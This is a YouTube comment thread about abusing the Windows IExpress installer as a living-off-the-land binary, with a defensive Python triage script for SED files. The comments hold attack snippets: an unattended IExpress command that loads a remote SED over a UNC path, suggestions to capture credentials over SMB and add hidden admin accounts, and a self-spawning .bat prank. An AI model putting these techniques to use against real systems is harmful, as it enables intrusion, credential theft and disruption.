I used to use IExpress back on Windows XP because I didn't know how to write a binder. Wait until you find out about WPF applications on web pages to bypass security. Not as easy as it used to be with IE, but still there. Also use an MSI file with resilience to re-download when the file is removed. Old as time, but works even today.
Reminds me of doing naughty things with WinRAR back in the day. You could create a WinRAR executable that would function like a normal zip file, but at the end of extraction you could specify an executable to run. So you could essentially give the downloader what they were looking for but sneak in a little surprise with it.
Still being used till today
With this I think I'm not just "living off the land", your computer is my Dukedom
"open and run this EXE on your computer, I promise it's not malware!" Hahaha John, one of your last videos showcased people watching YouTube tutorials and getting compromised by following those instructions! Kidding aside, I love the content, keep up the good work!
literally never heard of it, great video.
wow, you must have had a sad childhood if you never went to play in system32
@nyandesu9165 lol, not really, no. I had an iMac as a kid, not a Windows machine. I've just never read about this particular binary. I'll usually look at windir for DLL sideloading and stuff by checking missing DLLs in Procmon or whatever. Haven't explored a lot of LOLBins. :D
Finally the 40+ min. videos are back. I missed them. I would love more stuff like the 'Throwback Network' videos. And no offence, but the 10-15 min. videos with 3 min. advertisements in the middle got kinda boring over time. Love ya, take care. ❤
How do people even find this stuff! As an addicted learner of this genre of IT, this is gold!
I ❤ living in QUANTUM time, thanks to Microsoft (and John & the researchers)
This is golden info😊
This is some very good information, mister
You have my attention for rest of my life
This is mental, I will never trust an exe ever again 🤣 Thank goodness I use Linux as a daily OS
Why? Because you are only vulnerable to Linux viruses? You aren't safe just because you use Linux. Running things willy-nilly is bad no matter the OS. The strongest antivirus is a smart user, but even they aren't infallible.
Linux isn't immune to viruses. Also, you don't need to mention that you use Linux everywhere.
What an outro 😂 with the loop of calc
Love the early morning uploads! At least in California
it seems like a great tool to keep in the windows install... if you are the NSA 😲
After I saw you can automate it without any windows: it definitely should be on the list!
Would antivirus catch the iexpress instance though? Like when you first call iexpress, would antivirus throw a warning?
Probably not, as it’s built in on Windows. But if you use it to execute some generic and known malicious payload like from Metasploit, it will most likely block that.
very good information
You can put the command in the GUI too, it's not stopping you (13:05).
Cheers.
Seems to me the run command could be a nice SMB command to a machine you've got a listener on to grab creds and you're off to the races if you get the right person :)
BTW John have you seen some of the cute "shortcut" files people are trying to distribute of late that are malicious? Shady!
hm, that might be a problem
wtf John, stop please, you're makin' me really anxious about everything connected to the internet. :D
0:13 that's what they want you to think
From the 3 below, which one is efficient?
AWUS036ACM
AWUS036ACH
AWUS036NHA
According to you?
Sir, Would you make videos about scammers please 🙏
@romanemul1 Did I ask you? Or are you a scammer?
for "hackers", specifically the skids lmao
Well said 😂
Well, LOLBins aren't really only used by skiddies; several bigger threats have been using LOLBins like certutil or InstallUtil.
@88tx Well, I guess any good pentester would use anything at their disposal, even if it's easy. No reason to work twice the amount for the same outcome 🙂
I have seen something like that with .bat
Why would it be used specifically by script kids?
People like you seem to think real hackers are only using their own zero-days written in assembly and they're connecting to the internet by using hacked Norwegian satellites etc... lol
When you were running the .exe files, I assumed you were in an admin role. I am curious what would display on the UAC prompt for a non-admin role?
Would it have Microsoft on there? I noticed you showed it was unverified, but if it still says Microsoft, I am sure that is enough to fool most people?
Also, I was not sure where the connection to Internet Explorer came from in the Sigcheck details?
Rebuilding Installer.exe from Installer.SED - Can the other way around be done too?
Just curious
Damn it John. Stop burning my unknown lolbins!
100 percent of kids would do this on every PC in schools back in my day looooool, if only we had YouTube haha
You can right click on an exe and choose extract.
Definitely. After watching the video, certainly! :D
28:05 Tags, also known as "greater than less than symbol waka waka alligator faces" 🐊🐊
Okay serious question. I can't test it on my own machine, because it refused to build a cabinet, threw an error. If this was generated on a different PC and downloaded from the internet, it would still have the mark of the web though, right? And windows would at least try to prevent me from running it? Or is the point to generate the file on the infected machine itself? But then why use the malware program to create an executable that runs something, if it's already running malware? I'm not very familiar with LOLBAS or the like, but I'm curious. What exactly is the attack angle that Iexpress provides? (also silly me writing a comment mid-video, might get answered later)
Is it just obfuscation for deeper layers of malware? Or does it allow you to run programs in admin mode? That AdminQuiet mode seemed interesting, can that be used to level up your permissions?
This thing basically just zips your files and ships them as an exe. Literally any antivirus would detect it and see right through it, and only skids would use it.
Is the error you are getting referring to being unable to open the Report file? If that's the case, try running iexpress.exe from the same working directory that you are writing the EXE or CAB file to -- I've seen it be finicky with that. You are right that any file downloaded would still have Mark of the Web (unless you wrapped it inside of a container file like an ISO or others, like discussed in the previous MOTW video). As you mentioned, you certainly could generate the file on the same target machine you already have initial access on, and that can still be a valuable angle to either set up other persistence mechanisms, or craft one of those social engineering ploys like a "backdoored" regular and normal application, to trick an end user into willingly running a program as an elevated user, or entering credentials that otherwise weren't on the machine. Think of a tampered program sitting on the desktop that the user usually runs, or something pinned on their taskbar or in their start menu that anyone would just intentionally click on. And you are right that it can be extra obfuscation for deeper layers of malware just as well; it can just as easily be used for the next stage of an attack chain, again to obscure code execution. In regards to iexpress being "just an installer to run what you specify, as any installer would", keep in mind that CompressionType QUANTUM doesn't even need to have it invoke as an installer since you are simply running the command regularly and not its generated EXE... and there is nothing stopping you from providing the file with a remote location by an SMB network share or UNC path (iexpress.exe /n /q \\192.168.111.179\share\remote.SED), so it doesn't need to be on disk or depend on another file artifact.
@_JohnHammond Just tried it from the same folder, yeah that works. Thanks for the explanation, yeah that all makes sense. Fascinating.
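The reply above describes the two things a defender would actually want to look for: a SED whose AppLaunched / PostInstallCmd / AdminQuietInstCmd fields run something other than a benign installer, and iexpress.exe being driven unattended (/n /q) from a SED pulled over a UNC path. The following is an added example written for this page, not code from the video or from John Hammond: it parses a SED, resolves the %Name% references into the [Strings] section, and applies simple triage heuristics to the SED and to process-creation events. The sample SED and the three event records are constructed for the example; the field names follow the layout the IExpress wizard writes, and the interpreter list and "QUANTUM" check are the author's own heuristics, not a vendor rule.

```python
"""Triage IExpress SED files and iexpress.exe process events (added example)."""
import configparser
import re

# Constructed sample SED for this example, laid out the way the IExpress
# wizard writes one: [Options] holds %Name% placeholders resolved in [Strings].
SAMPLE_SED = r"""[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=0
HideExtractAnimation=1
UseLongFileName=1
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=N
CompressionType=QUANTUM
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles
[Strings]
InstallPrompt=
DisplayLicense=
FinishMessage=
TargetName=C:\Users\Public\Installer.exe
FriendlyName=Installer
AppLaunched=cmd.exe /c calc.exe
PostInstallCmd=<None>
AdminQuietInstCmd=
UserQuietInstCmd=
FILE0="readme.txt"
[SourceFiles]
SourceFiles0=C:\Users\Public\
[SourceFiles0]
%FILE0%=
"""

# Constructed process-creation events (image, parent, command line).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\iexpress.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"iexpress.exe /n /q \\192.168.111.179\share\remote.SED"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\System32\iexpress.exe",
     "cmdline": r"cmd.exe /c calc.exe"},
    {"image": r"C:\Windows\System32\iexpress.exe",   # wizard opened by hand
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "iexpress.exe"},
]

CMD_FIELDS = ("AppLaunched", "PostInstallCmd", "AdminQuietInstCmd", "UserQuietInstCmd")
# Heuristic (assumption): commonly abused interpreters/utilities, with or without .exe.
INTERP_RE = re.compile(
    r"\b(cmd|powershell|pwsh|mshta|rundll32|regsvr32|wscript|cscript|msiexec|certutil)(\.exe)?\b",
    re.I)
UNC_RE = re.compile(r"\\\\[\w.\-]+\\")   # \\host\ prefix of a UNC path


def parse_sed(sed_text):
    """Parse SED text (INI layout) and return [Options] with %Name% resolved from [Strings]."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str                      # keep key case (AppLaunched, not applaunched)
    cp.read_string(sed_text)
    strings = dict(cp["Strings"]) if cp.has_section("Strings") else {}
    resolved = {}
    for key, raw in cp["Options"].items():
        ref = re.fullmatch(r"%(\w+)%", raw.strip())
        resolved[key] = strings.get(ref.group(1), raw) if ref else raw
    return resolved


def flag_sed(sed_text):
    """Return reasons a SED deserves a closer look (empty list means nothing odd)."""
    opts = parse_sed(sed_text)
    reasons = []
    if opts.get("CompressionType", "").strip().upper() == "QUANTUM":
        reasons.append("CompressionType=QUANTUM, the mode discussed in the thread")
    for field in CMD_FIELDS:
        cmd = opts.get(field, "").strip()
        if not cmd or cmd == "<None>":
            continue                          # wizard default, nothing to run
        if INTERP_RE.search(cmd):
            reasons.append(f"{field} runs an interpreter: {cmd}")
        if UNC_RE.search(cmd):
            reasons.append(f"{field} references a UNC path: {cmd}")
    return reasons


def flag_process(event):
    """Flag an iexpress.exe launch, or an interpreter it spawned, from one event."""
    image = event["image"].lower()
    parent = event.get("parent", "").lower()
    cmdline = event.get("cmdline", "")
    reasons = []
    if image.endswith("iexpress.exe"):
        switches = {t.lower() for t in cmdline.split() if t.startswith("/")}
        if {"/n", "/q"} <= switches:
            reasons.append("iexpress.exe /n /q: unattended build, no wizard shown")
        if UNC_RE.search(cmdline):
            reasons.append("SED supplied from a UNC path: " + cmdline)
    if parent.endswith("iexpress.exe") and INTERP_RE.search(image.rsplit("\\", 1)[-1]):
        reasons.append(f"iexpress.exe spawned {event['image']}")
    return reasons


if __name__ == "__main__":
    for r in flag_sed(SAMPLE_SED):
        print("SED:", r)
    for ev in SAMPLE_EVENTS:
        for r in flag_process(ev):
            print("PROC:", r)
```

Running the block prints two SED findings (the QUANTUM compression type and AppLaunched invoking cmd.exe) and three process findings (the /n /q switches, the UNC SED path, and cmd.exe spawned under iexpress.exe); the interactively opened wizard in the third event produces nothing. The resolution step matters because the raw [Options] section only ever shows %AppLaunched%; the real command lives in [Strings].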
IExpress as a trojan is like the old comics, where the CIA uses old Soviet gear to perform surveillance. The old Soviet gear being giant satellite dishes with giant headphones and antennas.
Meow! Now, Everyone Is A Suspect! This Is The Back Door We All Suspected To Exist On A Global Scale, But Backwards! Now, If Each Binary Is A Lock, Then We Have Multiple Locks To Complete A Series. Then Technically Each Series Has A "Master" Key. So We Will Have Different Series Relating To Different Topics, Giving Us A Set Of "Grand Master" Keys. A Set Could Be 10 Master Keys, Which Would Be Considered Too Many! Why Do I SENSE, Somewhere In There, A "GRAND-GRAND MASTER" Key!? In All Things Considered, Human Nature Is Full Of Self Gratification Shortcuts Not To Repeat Insanity! Awesome Report On This One, John! YOU Gave Me Another Next TEN YEARS Of To-Do Fulfillment Duties, Then Be Outdated! LOL!
Go easy on the shift key bud. 😂
Maybe run net user add commands in the secondary options? Hefty way to have sneaked-in local admin accounts?
I wonder how to block that as part of Windows PC hardening🤔🤔🤔???
Honestly this only feels useful for a script kiddie kind of thing, because all of this is already trivial for actual developers, e.g. via Costura.
Can it bypass AV by first putting an exclusion on the C:\ drive, then executing PowerShell base64 in-memory ransomware?
no
Give up kid
This made me laugh out loud, Ty kid
it doesn't really work like that 😅
This fixes a problem which is not there, you understand? There are 1000s of ways of bundling your software, but like some other comments said: the AVs can see right through it (which is logical because it's not obfuscated...)
Yo mate, one of my machines just got hacked.
Other than Twitter, how can I send you the logs and artifacts?
It might be worth looking into, since you're into that stuff.
Nevermind. This video has what your site doesn't: the full list of links 😂
Hang on, you started a bomb on your actual computer instead of a virtual machine?
You're living on the edge here!
The duke of windows nuking
I would like to see this with Metasploit in action, but YouTube will not allow it, right?
youtube would allow it, it just wouldn't be very interesting
I mean you can use whatever you want for C&C lol, I'd rather use something that won't get flagged in memory or whatever, like a .NET agent, then use a Beacon or Meterpreter for advanced control after I have persistence.
Hey, can someone give me an idea of what I should price my mobile app at?? Its main purpose/function is to be able to hash files and verify files on mobile. I already made it and it works well, I just don't know what to price it at; was thinking £2? Don't want to open source it, got bills to pay. Any advice or ideas are welcome.
@seancrouch Why can't I do that on my PC? My phone is basically for calling and texting people and sometimes watching YouTube/surfing the web. If I were going to use my phone like a computer, I'd just install a Linux distro on it and have everything I could ever want for free.
Using this "SED" technique. lol
Not really living off the land when I have to then social engineer someone to install the file or run it from within a service I've already exploited. Better ways to get this done, nice way to make an installer though, I guess...
Windows defender instantly detected my test file lol
Gosh, this is like those WinRAR or WinZip self-extracting zip or rar files, where it auto-extracts and runs the applications you want to run (either making your own version of an installation of a software, or this).
Or stuff like NSIS or InstallShield, which I also used a bit.
Sup
The wikipedia page on this is interesting. But I am trying to figure out - why does it exist? But yes, it belongs in the lolbin category.
IExpress is something the RAT kiddies used to love using to pack up the nasty RATs. Not seen this in a long time; surprised it's not in the LOTL files.
I wonder if you can prompt a user to run it with admin privilege
you can, just like you can with any exe
@yukiqt Yeah, but the installer doesn't specifically ask for admin privilege
@k4m1kazep1lot4 If you're asking if it can bypass UAC, it can't
Hi
Bypass antivirus with iexplorer, encode payload in Opera, for example
Oh jeez, of course that's a LOLBin
yikes
I can't try it out because my PC doesn't run Windows
poor little linux user
Runs in WINE on linux.
@_Yassir_ In the words of OTW, "if you don't know Linux, you're not a hacker."
@not_user11 I use Windows stuff like this all the time. Pretty much anything old, or CLI, will run with WINE. Hell, I'd say a good 80% of Windows software, even a lot of newer stuff, runs pretty well with WINE. This will run flawlessly.
41 minutes of yapping just to tell us that an installer can run whatever you tell it to.
You may be right about that, but remember, you aren't entitled to anything and he doesn't owe us anything.
Don't be a dick, bud.
He literally jumped right in and explained what the tool was.
@MygenteTV 🤓
@HyBlock spoken like someone who doesn't understand how lolbin attacks work
Bro who you yelling at tho
He's just passionate about the subject. He doesn't yell half as much as some youtubers do.
@@Cyba_IT I'm just trying to stay chill and learn about IT not have lunch with Samuel L Jackson 😆😆😆
@@looweegee252 😂😂😂
Don't worry, soon Microsoft will get rid of all the old [control panel] and other vintage [features] and stuff in Windows, so you don't mess around :D
Update: they are not getting rid of it
Yup just like those .pif files too.
bro
basically first
lol classic
omg
first
Bb
tfw no secret end-of-video keyword 😞
second
First 🥇
This is kind of stupid.
Any installer maker can do this, and there are many easier to use and abuse. It is not in the list because AN INSTALLER MAKER is known to be able to do this; it is not a design flaw or weakness.
This isn't stupid. It comes pre-installed even in the latest version of windows. It can be used for living off the land. Any installer won't be present by default in a windows device that you gained access to but this one is native to windows.
@anik2443 It does not matter that it comes with Windows. Why would it?
It's not like YOU are making your own malware to infect yourself.
Any bad actor can use whatever, it doesn't have to be pre-installed. That is why it is stupid.
@VaracolacidVesci Do you know nothing about post-exploitation? It's for remaining undetected by using tools available natively in the system. Go research it.
@anik2443 hahahaha of course not! You are trying to sound fancy, but clearly you are just another asshole on the internet.
it's not like the av engines or any other software would say OH it is made by the system tool, let's allow it!.
hahaha how stupid can you be
@anik2443 hahahaha OF COURSE NOT!
There is nothing special about it being on the system, it's not like the exe would have anything special about it. It's not like the AV engines or any other protection would say, OH it is made by the system tool, let's allow it regardless, hahahaha HOW STUPID CAN YOU BE?
Bring game hacking 🎉❤
First 😂
I remember pranking my friends with a .bat file (named hello.bat) containing:
start hello.bat
call hello.bat
very funny, unless you have unsaved work
(unfortunately it won't work if you don't have access to "start" like on school computers, but you can still call other programs using "call", it's just not exponential)
Instructions unclear. Typing does nothing on my Windows 95 computer's start menu.